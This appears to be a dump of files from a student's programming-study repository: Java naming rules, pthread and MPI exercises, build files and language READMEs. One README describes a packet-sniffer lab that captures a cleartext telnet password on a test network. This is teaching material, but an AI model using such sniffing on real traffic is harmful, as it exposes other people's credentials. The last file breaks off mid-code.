ASCII letters and digits, and, in a small number of cases noted below, underscores. Thus each valid identifier name is matched by the regular expression `\\w+` .\n\nIn Google Style special prefixes or suffixes, like those seen in the examples `name_`, `mName`, `s_name` and `kName`, are **not** used.\n\n### 2 Rules by identifier type[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2-specific-identifier-names)\n\n#### 2.1 Package names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.1-package-names)\n\nPackage names are all lowercase, with consecutive words simply concatenated together (no underscores). For example, `com.example.deepspace`, not `com.example.deepSpace` or `com.example.deep_space`.\n\n#### 2.2 Class names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.2-class-names)\n\nClass names are written in [UpperCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nClass names are typically nouns or noun phrases. For example, `Character` or `ImmutableList`. Interface names may also be nouns or noun phrases (for example, `List`), but may sometimes be adjectives or adjective phrases instead (for example, `Readable`).\n\nThere are no specific rules or even well-established conventions for naming annotation types.\n\n*Test* classes are named starting with the name of the class they are testing, and ending with `Test`. For example, `HashTest` or `HashIntegrationTest`.\n\n#### 2.3 Method names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.3-method-names)\n\nMethod names are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nMethod names are typically verbs or verb phrases. 
For example, `sendMessage` or `stop`.\n\nUnderscores may appear in JUnit *test* method names to separate logical components of the name, with *each* component written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case). One typical pattern is `*<methodUnderTest>*_*<state>*`, for example `pop_emptyStack`. There is no One Correct Way to name test methods.\n\n#### 2.4 Constant names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.4-constant-names)\n\nConstant names use `CONSTANT_CASE`: all uppercase letters, with each word separated from the next by a single underscore. But what *is* a constant, exactly?\n\nConstants are static final fields whose contents are deeply immutable and whose methods have no detectable side effects. This includes primitives, Strings, immutable types, and immutable collections of immutable types. If any of the instance's observable state can change, it is not a constant. Merely *intending* to never mutate the object is not enough. 
Examples:\n\n```\n// Constants\nstatic final int NUMBER = 5;\nstatic final ImmutableList<String> NAMES = ImmutableList.of(\"Ed\", \"Ann\");\nstatic final ImmutableMap<String, Integer> AGES = ImmutableMap.of(\"Ed\", 35, \"Ann\", 32);\nstatic final Joiner COMMA_JOINER = Joiner.on(','); // because Joiner is immutable\nstatic final SomeMutableType[] EMPTY_ARRAY = {};\nenum SomeEnum { ENUM_CONSTANT }\n\n// Not constants\nstatic String nonFinal = \"non-final\";\nfinal String nonStatic = \"non-static\";\nstatic final Set<String> mutableCollection = new HashSet<String>();\nstatic final ImmutableSet<SomeMutableType> mutableElements = ImmutableSet.of(mutable);\nstatic final ImmutableMap<String, SomeMutableType> mutableValues =\n ImmutableMap.of(\"Ed\", mutableInstance, \"Ann\", mutableInstance2);\nstatic final Logger logger = Logger.getLogger(MyClass.getName());\nstatic final String[] nonEmptyArray = {\"these\", \"can\", \"change\"};\n```\n\nThese names are typically nouns or noun phrases.\n\n#### 2.5 Non-constant field names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.5-non-constant-field-names)\n\nNon-constant field names (static or otherwise) are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nThese names are typically nouns or noun phrases. 
For example, `computedValues` or `index`.\n\n#### 2.6 Parameter names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.6-parameter-names)\n\nParameter names are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nOne-character parameter names in public methods should be avoided.\n\n#### 2.7 Local variable names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.7-local-variable-names)\n\nLocal variable names are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nEven when final and immutable, local variables are not considered to be constants, and should not be styled as constants.\n\n#### 2.8 Type variable names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.8-type-variable-names)\n\nEach type variable is named in one of two styles:\n\n- A single capital letter, optionally followed by a single numeral (such as `E`, `T`, `X`, `T2`)\n- A name in the form used for classes (see Section 5.2.2, [Class names](https://google.github.io/styleguide/javaguide.html#s5.2.2-class-names)), followed by the capital letter `T` (examples: `RequestT`, `FooBarT`).\n\n### 3 Camel case: defined[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case)\n\nSometimes there is more than one reasonable way to convert an English phrase into camel case, such as when acronyms or unusual constructs like \"IPv6\" or \"iOS\" are present. To improve predictability, Google Style specifies the following (nearly) deterministic scheme.\n\nBeginning with the prose form of the name:\n\n1. Convert the phrase to plain ASCII and remove any apostrophes. For example, \"Müller's algorithm\" might become \"Muellers algorithm\".\n\n2. 
Divide this result into words, splitting on spaces and any remaining punctuation (typically hyphens).\n\n - *Recommended:* if any word already has a conventional camel-case appearance in common usage, split this into its constituent parts (e.g., \"AdWords\" becomes \"ad words\"). Note that a word such as \"iOS\" is not really in camel case *per se*; it defies *any* convention, so this recommendation does not apply.\n\n3. Now lowercase\n\n \n\n everything\n\n \n\n (including acronyms), then uppercase only the first character of:\n\n - ... each word, to yield *upper camel case*, or\n - ... each word except the first, to yield *lower camel case*\n\n4. Finally, join all the words into a single identifier.\n\nNote that the casing of the original words is almost entirely disregarded. Examples:\n\n| Prose form | Correct | Incorrect |\n| ----------------------- | ----------------------------------- | ------------------- |\n| \"XML HTTP request\" | `XmlHttpRequest` | `XMLHTTPRequest` |\n| \"new customer ID\" | `newCustomerId` | `newCustomerID` |\n| \"inner stopwatch\" | `innerStopwatch` | `innerStopWatch` |\n| \"supports IPv6 on iOS?\" | `supportsIpv6OnIos` | `supportsIPv6OnIOS` |\n| \"YouTube importer\" | `YouTubeImporter``YoutubeImporter`* | |\n\n*Acceptable, but not recommended.\n\n**Note:** Some words are ambiguously hyphenated in the English language: for example \"nonempty\" and \"non-empty\" are both correct, so the method names `checkNonempty` and `checkNonEmpty` are likewise both correct." 
}, { "alpha_fraction": 0.719773530960083, "alphanum_fraction": 0.744439959526062, "avg_line_length": 32.863014221191406, "blob_id": "0c98e4c7ec624ca9c9c028a8c47ebb8e28a60bc9", "content_id": "2916e48d33f4f9ebe0b4c57f864fb0f2a2a6c46e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3404, "license_type": "permissive", "max_line_length": 165, "num_lines": 73, "path": "/c/projects/POSIX/Lab2/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# 实验1 进程和进程通信\n> DDL: 2017/05/08 24:00\n\n## Helloworld\n参考教材写出helloworld,大致的流程已经清楚,不过还是踩了点坑,比如如下程序跑的话就会多输出一个'h'字符。\n```C\n#include <stdio.h> // for printf()\n#include <pthread.h> // for pthread_*, thread_*\n#include <assert.h> // for assert()\n\n// \nvoid* pthread_work(void* arguement) {\n // use type cast to get data from arguement\n char* print_str = (char*)arguement;\n // process data\n printf(\"%s\\n\", print_str);\n return NULL;\n}\n\nint main(int argc, char *argv[]) {\n pthread_t thread;\n pthread_attr_t attr;\n char thread_argument[] = \"Hello World!\"; \n pthread_attr_init(&attr);\n\n // Create pthread\n int result_code = pthread_create(&thread, &attr, pthread_work, thread_argument);\n \n printf(\"In Main All threads completed\\n\");\n // block call \n // pthread_join(thread, NULL);\n // printf(\"Exit\\n\");\n \n return 0;\n}\n```\n想想可能是因scope是system的缘故,于是又发现setscope失败最后才发现linux / Mac OS X 仅允许设置PTHREAD SCOPE SYSTEM,那就无解了。只能说这样初始化了线程却不使用是不可取的行为。\n```C\n // Update: linux / Mac OS X 仅允许设置PTHREAD SCOPE SYSTEM。\n assert(pthread_attr_setscope(&attr, PTHREAD_SCOPE_PROCESS) == 0 );\n```\n\n## 用线程生成Fibonacci数列\n> 用pthread线程库,按照第四章习题4.11的要求生成并输出Fibonacci数列\n\n具体代码请参考2.1.fibonacci.c,思路大概就是面向过程,逐步求精,把计算那一提出到线程中完成,另外使python测试了 4byte signed int 能保存的最大,同时也可以运行2.1.cal_size.py来参考结果是否一致。\n\n## 多线程矩阵乘法\n> 给定两个矩阵A和B,其中A是具有M行、K列的矩阵, B为K行、N列的矩阵, A和B的矩阵积为矩阵C, C为M行、N列。矩阵C中第i行、第j列的元素Cij就是矩阵A第i行每个元素和矩阵B第j列每个元素乘积的和。\n\n> 要求:每个Ci 
j的计算用一个独立的工作线程,因此它将会涉及生成M×N个工作线程。主线程(或称为父线程)将初始化矩阵A和B,并分配足够的内存给矩阵C,它将容纳矩阵A和B的积。这些矩阵将声明为全局数据,以使每个工作线程都能访问矩阵A、B和C。\n\n老师之前说过会给文件读写,也没有发现文件在哪里,无奈之下自己写了生成文件的代码,使用`bash 2.2.test.sh`一键生成、编译、测试、删除。\n\n具体代码请参考2.2.matrix.c\n\n## Reference\n\n[POSIX thread (pthread) libraries](http://www.yolinux.com/TUTORIALS/LinuxTutorialPosixThreads.html)\n\n[man pthread_attr_init](http://man7.org/linux/man-pages/man3/pthread_attr_init.3.html)\n\n[man pthread_attr_setscope](http://man7.org/linux/man-pages/man3/pthread_attr_setscope.3.html)\n\n[man pthread_create](http://man7.org/linux/man-pages/man3/pthread_create.3.html)\n\n[How to return a value from thread in C](http://stackoverflow.com/questions/2251452/how-to-return-a-value-from-thread-in-c)\n\n[Read CSV file to a 2D array on C](http://stackoverflow.com/questions/20013693/read-csv-file-to-a-2d-array-on-c)\n\n[reference-cstdio-fgets](http://www.cplusplus.com/reference/cstdio/fgets/)\n\n[Unix diff - how to ignore line endings when comparing files?](http://stackoverflow.com/questions/40974170/unix-diff-how-to-ignore-line-endings-when-comparing-files)\n\n" }, { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.7031963467597961, "avg_line_length": 19.809524536132812, "blob_id": "69edf1cbdc0d41f5af4a61200a0f2743cd5bfe45", "content_id": "c71dd0af15dc70ae270c81c697ea0f0e0439de59", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 634, "license_type": "permissive", "max_line_length": 59, "num_lines": 21, "path": "/scheme/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Scheme\n`jskyzero` `2017/01/19`\n\n## Overview\n\n+ 最初是学习《计算机程序的构造的解释》的相关代码。\n+ Scheme\n + Scheme是一种函数式编程语言,是Lisp的两种主要方言之一(另一种为Common Lisp)。\n + Scheme遵循极简主义哲学,以一个小型语言核心作为标准,加上各种强力语言工具(语法糖)来扩展语言本身。\n+ ...\n\n## Install & Run\n\n+ Install: I use [Racket](https://racket-lang.org/)\n+ Run: use Racket run those codes\n\n## Reference\n\n+ [Scheme 
Reports](http://www.scheme-reports.org/)\n+ [The Racket repository](https://github.com/racket/racket)\n+ ...\n\n" }, { "alpha_fraction": 0.5084269642829895, "alphanum_fraction": 0.5252808928489685, "avg_line_length": 18.83333396911621, "blob_id": "bb29e94e400c6a48e585fd97e1d20be81b36cd42", "content_id": "eea2c554d7fe9f55cc0acda572c38bdd1dd7d1d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 356, "license_type": "permissive", "max_line_length": 59, "num_lines": 18, "path": "/c/hardwork/library/stdarg/va_list.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> //for printf()\n#include <stdarg.h> //for va_start(), va_end(), va_arg() \n\nvoid print_many(int argc, ...) {\n int num;\n va_list argv;\n va_start(argv, argc);\n for (int i = 0; i < argc; i++) {\n num = va_arg(argv, int);\n printf(\"%d is %d \\n\", i, num);\n }\n va_end(argv);\n}\n\nint main() {\n print_many(3, 1, 2, 3);\n return 0;\n}" }, { "alpha_fraction": 0.5227892398834229, "alphanum_fraction": 0.5247370600700378, "avg_line_length": 30.317073822021484, "blob_id": "22dd005f6b7d9fb14b4f7b4d4eacc07b16a61c67", "content_id": "6624409eaef9cbbe1d659dc56b293ba5b5c831d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ant Build System", "length_bytes": 2567, "license_type": "permissive", "max_line_length": 83, "num_lines": 82, "path": "/java/projects/gridworld/Part4/RockHound/build.xml", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!--Ok, Now I learn To use xml and ant -->\n<!--project\n name : name\n default : default run target (must)\n basedir : default is local dir-->\n<project name=\"HelloWorld\" default=\"info\">\n <property file=\"build.properties\"/>\n\n <path id=\"classpath\">\n <pathelement location=\"${lib.dir}/gridworld.jar\"/>\n <pathelement location=\"${lib.dir}/junit-4.9.jar\"/>\n 
</path>\n\n <!--target\n name : name (must)\n depends : use ',' between many depends\n description : like name\n if : if not exits, Not Run\n unless : if not exits, Run-->\n <target name=\"info\">\n <echo>Hello World - Welcome to Apache Ant!</echo>\n </target>\n\n <target name=\"compile\" description=\"compile app\">\n <mkdir dir=\"${classes.dir}\"/>\n <javac \n classpathref=\"classpath\"\n srcdir=\"${src.dir}\" \n destdir=\"${classes.dir}\" \n includeantruntime=\"false\">\n </javac>\n </target>\n\n <target name=\"jar\">\n <mkdir dir=\"${build.dir}\"/>\n <jar \n destfile=\"${build.dir}/${main-class}.jar\" basedir=\"${classes.dir}\">\n <manifest>\n <attribute name=\"Main-Class\" value=\"${main-class}\"/>\n <attribute name=\"Class-Path\" value=\"../lib/gridworld.jar\"/>\n </manifest>\n </jar>\n </target>\n \n <target name=\"run\" description=\"run app\" depends=\"compile, jar\">\n <java jar=\"${build.dir}/${main-class}.jar\" fork=\"true\">\n </java>\n </target>\n\n <target name=\"test-compile\" description=\"compile tests\" depends=\"compile, jar\">\n <mkdir dir=\"${tests.dir}\"/>\n <javac \n srcdir=\"${test.dir}\" \n destdir=\"${tests.dir}\" \n includeantruntime=\"false\">\n <classpath>\n <path refid=\"classpath\"/>\n <pathelement location=\"${classes.dir}\" />\n </classpath>\n </javac>\n </target>\n\n <target name=\"test\" depends=\"test-compile\">\n <junit printsummary=\"on\" haltonfailure=\"yes\" fork=\"true\">\n <classpath>\n <path refid=\"classpath\"/>\n <pathelement location=\"${tests.dir}\" />\n <pathelement location=\"${classes.dir}\"/>\n </classpath>\n <formatter type=\"brief\" usefile=\"false\" />\n <batchtest>\n <fileset dir=\"${test.dir}\" includes=\"*.java\"/>\n </batchtest> \n </junit>\n </target>\n\n <target name=\"clean\">\n <delete dir=\"${build.dir}\"/>\n </target>\n\n</project>" }, { "alpha_fraction": 0.6131479144096375, "alphanum_fraction": 0.6257901191711426, "avg_line_length": 21.628570556640625, "blob_id": 
"8f4f1dd028bb4206dee9971e99d88519b223c44b", "content_id": "d1b0a7348a9f9b447ad47beac8abf07c4d2af05e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 791, "license_type": "permissive", "max_line_length": 75, "num_lines": 35, "path": "/c/projects/MPI/hardway/MPI_comm_create.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, new_numprocs;\n MPI_Group group_world, odd_group;\n MPI_Comm new_comm;\n int i;\n int members[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n members[i] = 2 * i + 1;\n }\n\n MPI_Group_incl(group_world, numprocs / 2, members, &odd_group);\n\n // int MPI_Comm_create(MPI_Comm comm, MPI_Group group, MPI_Comm *newcomm)\n MPI_Comm_create(MPI_COMM_WORLD, group_world, &new_comm);\n\n if (myid % 2 != 0) {\n MPI_Comm_size(new_comm, &new_numprocs);\n\n printf(\"The new comm's size is %d.\\n\", new_numprocs);\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.7498204708099365, "alphanum_fraction": 0.7639454007148743, "avg_line_length": 50.567901611328125, "blob_id": "aa8dfbb8cf49641dbbf0b09d1a3e9166be6a6a3a", "content_id": "4532c668db6b52976ce2835d512f302a30de780a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4501, "license_type": "permissive", "max_line_length": 648, "num_lines": 81, "path": "/c/projects/sniff/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Sniff\n`jskyzero` `2017/11/26`\n\n## Overview\n\nminisniff is a mini sniff that capture package and show some info about the package.\n\n## Install & Run\n1. Fitst Install Dependence `sudo apt-get install libpcap0.8-dev`\n\n2. 
Try to Make it `make`\n\n3. Run as `sudo ./minisniff 2` to capture 2 package\n\n## Question & Answer\n\n1. What library does minisniff use to capture packets? Where in the web can you find more information about this library?\n\n\tlibpcap: a portable C/C++ library for network traffic capture.\n\n\tofficial web site: http://www.tcpdump.org/\n\n2. Do some research and describe the advantages/disadvantage of using this library? Do not blindly copy and paste material from the web. Try to understand the material you find and write what you understood.\n\n\tadvantages: 隔离底层细节,提供上层接口方便使用/利用操作系统提供的过滤机制,减少资源开销\n\tdisadvantage: 是 C/C++ 的库,受限于编程语言的局限性。\n\n3. Are there any alternative libraries available to capture packets? (Open source only)\n\n\t+ [pcap4j A Java library for capturing, crafting, and sending packets](https://github.com/kaitoy/pcap4j)\n\t+ [libtins packet crafting and sniffing library](https://github.com/mfontanini/libtins)\n\n4. Explain the purpose of the following functions:\n\t+ pcap_lookupdev: locating the network card(find the default device on which to capture)\n\t+ pcap_open_live: open the network card to sniff(open a device for capturing)\n\t+ pcap_lookupnet: find the IPv4 network number and netmask for a device\n\t+ pcap_compile: compile a filter expression\n\t+ pcap_setfilter: pcap_setfilter - set the filter\n\t+ pcap_next: read the next packet from a pcap_t\n\t+ pcap_loop: read the network card and returns numbers of packets captured\n\t+ pcap_dispatch: process packets from a live capture or savefile\n\n5. There are five layers in the TCP/IP stack (application, transport, network, link, and physical). Up to what layer can minisniff decode data from the captured\npackets? Justify your answer using the code.\n\n\t从运行时候的mac address可以推测是在数据链路层,在manpage中也有说明:`... 
probably includes a link-layer header...`\n\n\n## telnet\n\n+ I have windows 10 and linux OS, It seems that windows 10 don't have the unsafe telnet server, I use Linux as the server, you can find how to install it on internet.\n\n+ linux server : `sudo /etc/init.d/xinetd start`, then windows client `telnet 192.168.199.100`, you can open wireshark to capture package.\n\n+ use wireshark to analysis which bytes is passworld and should disply\n\n![](docs/1.png)\n\n图上是判断flag字段,处理的方法十分简单粗暴,判断mac地址保留client的包,然后判断flag字段保留Telnet包,然后打印对于字段。\n\n+ then compile and run and output ans.\n\n![](docs/2.png)\n由于捕捉到包以后是逆序输出所以实际上是12 / 123,不可见字符是因为打印太暴力了。\n\n## Original Readme\n\n```\n\t\treadme file for minisniff\n\t\t-------------------------\ni don't think i need to tell you this but i'll tell it anyway, minisniff is written for you to experiment with the source code for network security classes CS393/CS682. DO NOT USE this sniffer outside our security testbed in isis lab.\n\nso, this is a sample code for how to start writing a sniffer. i hope this answers most of your questions about how hard/easy it is to capture packets off the wire and how to write a sniffer etc. you need to download and install pcap (packet capture) library on your machine to compile the sniffer. you can download pcap from http://www.tcpdump.org/ once you install the pcap library all you need to do is type 'make' in the directory where you have this README file, so that the files can be compiled. there shouldn't be errors or warnings, if so email me the errors, copy-paste them, don't even attempt to describe the errors on your own words:-) \n\nif you just want to run the sniffer and see what it does use the compiled 'minisniff' file that comes with this file, then you don't need pcap library, but the file is compiled on Linux (i-386, ELF) so obviously it wont work on other operating systems. 
you should be able to execute the sniffer by typing './minisniff 20' to capture and display information about 20 packets.\n\nfeel free to modify the code and enhance the sniffer as you please. drop me a line if you need any help, but i don't guarantee that i'd be able to help you.\n```\n\n## Reference\n+ [Programming with pcap](https://www.tcpdump.org/pcap.html)\n" }, { "alpha_fraction": 0.542518138885498, "alphanum_fraction": 0.6005273461341858, "avg_line_length": 21.984848022460938, "blob_id": "a4d9c1fad363a25cd4291795b6113352238ff35d", "content_id": "d45dc77dfcbcb4f9bfd69f2a075877cd3c043ab6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1517, "license_type": "permissive", "max_line_length": 80, "num_lines": 66, "path": "/c/projects/POSIX/Lab2/2.2.produce_data.py", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\"\"\"produce data for matrix\nexample:\n2,3,2\n00,01,02\n10,11,12\n00,01\n10,11\n20,21\n\nmeans:\nA = 2 X 3\nB = 3 X 2\nA = 0, 1, 2\n 10, 11, 12\nB = 0, 1\n 10, 11\n 20, 21\n\"\"\"\n\nimport random\nimport csv\n\n# max value 1000^3 < 1<<31\nMATRIX_MAX_SIZE = 1000\nDATA_FILE_NAME = \"2.2.data.csv\"\nANS_FILE_NAME = \"2.2.ans.csv\"\n\n\ndef prouce_value():\n \"\"\"produce a random value in [1, MATRIX_MAX_SIZE]\"\"\"\n return random.randint(1, MATRIX_MAX_SIZE)\n\n\ndef produce_matrix(row, column):\n \"\"\"prodece a random num matrix\"\"\"\n return [[prouce_value() for _ in xrange(0, column)] for _ in xrange(0, row)]\n\n\ndef write_data_file(matrix1, matrix2):\n \"\"\"write two matrix to file\"\"\"\n with open(DATA_FILE_NAME, \"wb\") as outfile:\n head_info = [[len(matrix1), len(matrix1[0]), len(matrix2[0])]]\n csv_writer = csv.writer(outfile)\n csv_writer.writerows(head_info + matrix1 + matrix2)\n\n\ndef cal_ans(matrix1, matrix2):\n \"\"\"cal the ans matrix\"\"\"\n return [[sum(a * b for a, b in zip(row_1, row_2))\n for row_2 in zip(*matrix2)] for row_1 in 
matrix1]\n\n\ndef write_ans_file(ans):\n \"\"\"write One matrix to file\"\"\"\n with open(ANS_FILE_NAME, \"wb\") as outfile:\n head_info = [[len(ans), len(ans[0])]]\n csv_writer = csv.writer(outfile)\n csv_writer.writerows(head_info + ans)\n\n\nif __name__ == \"__main__\":\n SAME = prouce_value()\n A = produce_matrix(prouce_value(), SAME)\n B = produce_matrix(SAME, prouce_value())\n write_data_file(A, B)\n write_ans_file(cal_ans(A, B))\n" }, { "alpha_fraction": 0.7247486710548401, "alphanum_fraction": 0.7348013520240784, "avg_line_length": 41.632652282714844, "blob_id": "fc95e3562a1a07128f468d4a0ebc04eb51e52b5c", "content_id": "5bac34ae7bc790aa695204c981fe94f3b00c4545", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2781, "license_type": "permissive", "max_line_length": 204, "num_lines": 49, "path": "/csharp/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C#-Study\n`jskyzero` `2017/12/31`\n## Overview\n+ C#是微软推出的一种基于.NET框架的、面向对象的高级编程语言。\n+ 语言本身深受Visual Basic、Java、C和C++ 的影响。\n+ C#旨在设计成为一种“简单、现代、通用”,以及面向对象的程序设计语言\n+ C# 是 .NET 框架的一部分,且用于编写 .NET 应用程序。因而我们可能需要先了解下 .NET\n\n![.NET 体系结构组件](https://docs.microsoft.com/zh-cn/dotnet/standard/media/components.png)\n\n[.NET框架](https://docs.microsoft.com/zh-cn/dotnet/standard/components)以通用语言运行库为基础,支持多种语言。.NET框架包括称为公共语言运行时(CLR)的虚拟执行系统和统一的类库,CLR是微软对通用语言架构(CLI,Common Language Infrastructure)的实现。通用语言架构定义了一个语言无关的跨体系结构的运行环境。\n\n1. C#源代码被编译成符合CLI规范的中间语言(IL),IL代码与资源文件一起作为程序集文件存为.{exe|dll}文件。\n2. 
执行C#程序时候,程序集被加载到CLR中,如果符合安全要求,则CLR执行实时(JIT)编译将IL代码转化为本机机器指令,CLR还提供自动垃圾回收,异常处理和资源管理有关的其他服务。\n\n## Structure\n```\n.\n├── docs //documents\n├── hardwork\n│   ├── hardway // practice code\n│   └── runoob // runoob practice code\n├── projects\n│   └── todolist // A simpile todolist\n└── README.md\n```\n\n## Naming Style\n\n+ Namespace : Pascal Case (also called `UpperCamelCase`).\n+ Classes and Structures : Pascal Case.\n+ Interfaces : Follow class naming conventions, but start the name with `I` and capitalize the letter following the `I`.\n+ Functions : Pascal Case.\n+ Properties and Public Member Variables : Pascal Case.\n+ Parameters and Procedure-level Variables : Camel Case (or `lowerCamelCase`).\n\n> + Pascal case: writing compound words or phrases such that the first letter of each concatenated word is capitalized.\n> + Camel case: writing compound words or phrases such that each word or abbreviation in the middle of the phrase begins with a capital letter. \n> + upper camel case (initial upper case letter, also known as Pascal Case).\n> + lower camel case (initial lower case letter).\n\n## Reference\n\n+ [Github dotnet core](https://github.com/dotnet/core)\n+ [Github dotnet csharp](https://github.com/dotnet/csharplang)\n+ [Github Microsoft dotnet](https://github.com/Microsoft/dotnet)\n+ [Wikipedia C#](https://zh.wikipedia.org/wiki/C%E2%99%AF)\n+ [MSDN C# 教程](https://msdn.microsoft.com/zh-cn/library/aa288463(v=vs.71).aspx)\n+ [RUNOOB C# 教程](http://www.runoob.com/csharp/csharp-tutorial.html)\n" }, { "alpha_fraction": 0.4677419364452362, "alphanum_fraction": 0.5, "avg_line_length": 30, "blob_id": "592c90a5bfc9dbc72c5e7428b1af98d23c5076c3", "content_id": "0d769b0dccd741e115baec7f07b4758e07aabfbd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 124, "license_type": "permissive", "max_line_length": 62, "num_lines": 4, "path": "/c/hardwork/hardway/GCD_short.c", "repo_name": "jskyzero/Languages", 
"src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint GCD(int a, int b) { return (0 == b) ? a : GCD(b, a % b); }\nint main() { printf(\"%d\", GCD(5, 25)); }\n" }, { "alpha_fraction": 0.6679643988609314, "alphanum_fraction": 0.6763070225715637, "avg_line_length": 39.8636360168457, "blob_id": "7efee89c0e0f81a6ff73fc9fbb09838c593479d5", "content_id": "78bbfbf3a317154de702ad412110697a21bebe7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2160, "license_type": "permissive", "max_line_length": 213, "num_lines": 44, "path": "/java/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Java-Study\n`jskzyero` `2017/12/31`\n\n## Overview\n+ Java是由Sun Microsystems公司于1995年5月推出的Java面向对象程序设计语言和Java平台的总称。\n + JDK(Java Development Kit):针对Java开发人员的软件开发包(SDK,Software delelopment kit),包括(javac、java、jar、javadoc)。\n + JRE(Java Runtime Environment):普通用户安装的版本,记得我们要装的是JDK。\n + Apache Ant:A Java library and command-line tool use to build Java application\n + 在学习的一开始推荐暂时不考虑使用IDE,因而上述基础环境是需要自己配置的,即便是Windows也只需要添加好Path就可以愉快开坑。\n+ ...\n\n## Structure\n```\n.\n├── docs // documents\n├── hardwork\n│   ├── ant // use ant to build code\n│   ├── hardway // practice code\n│   ├── helloworld // fisrt code to java\n│   ├── junit // junit unit test\n│   ├── swing // swing gui\n│   └── tips // some useful tips\n├── projects\n│   ├── gridworld // A grid world let you play with\n│   └── todolist // A simple todolist\n└── README.md\n```\n\n## Naming Style\n\n+ Common rules : only ASCII letters and digits, can matched by the regular expression `\\w+ `. special prefixes or suffixes, like those seen in the examples `name_`, `mName`, `s_name` and `kName`, are **not** used.\n\n\n+ Package names : `com.example.deepspace`, not `com.example.deepSpace` or `com.example.deep_space`.\n+ Class names : UpperCamelCase. 
`Character` or `ImmutableList`.\n+ Constant names : `CONSTANT_CASE`\n+ Method names, Non-constant field names, Parameter names, Local variable names : lowerCamelCase.\n+ Type variable names : A single capital letter, optionally followed by a single numeral (such as `E`, `T`, `X`, `T2`, examples: `RequestT`, `FooBarT`)\n\n## Reference\n\n+ [Java Tutorials Learning Paths](https://docs.oracle.com/javase/tutorial/tutorialLearningPaths.html)\n\n+ [Google Java Style Guide](https://google.github.io/styleguide/javaguide.html#s5-naming)\n" }, { "alpha_fraction": 0.532619297504425, "alphanum_fraction": 0.5472249388694763, "avg_line_length": 22.9069766998291, "blob_id": "d14153516b6a3d862ffc3b7253d2c955c21a91ce", "content_id": "04368fd1f79a03dcc5e76c864359b83411063d4a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1145, "license_type": "permissive", "max_line_length": 73, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_gather.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 在一个进程中从所有进程获取信息,\n// 例如将所有进程中的一个数组都收集到根进程中作进一步的处理,这样的集合通信我们叫做收集。\n\n#include <mpi.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n int dest = 0;\n int array[5] = {1, 2, 3, 4, 5};\n int *rbuf;\n int i, j;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n if (myid == dest) {\n rbuf = (int *)malloc(numprocs * 5 * sizeof(int));\n }\n\n // int MPI_Gather(void* sendbuf, int sendcount, MPI_Datatype sendtype, \n // void* recvbuf, int recvcount, MPI_Datatype recvtype, \n // int root, MPI_Comm comm)your code here\n MPI_Gather(array, 5, MPI_INT,\n 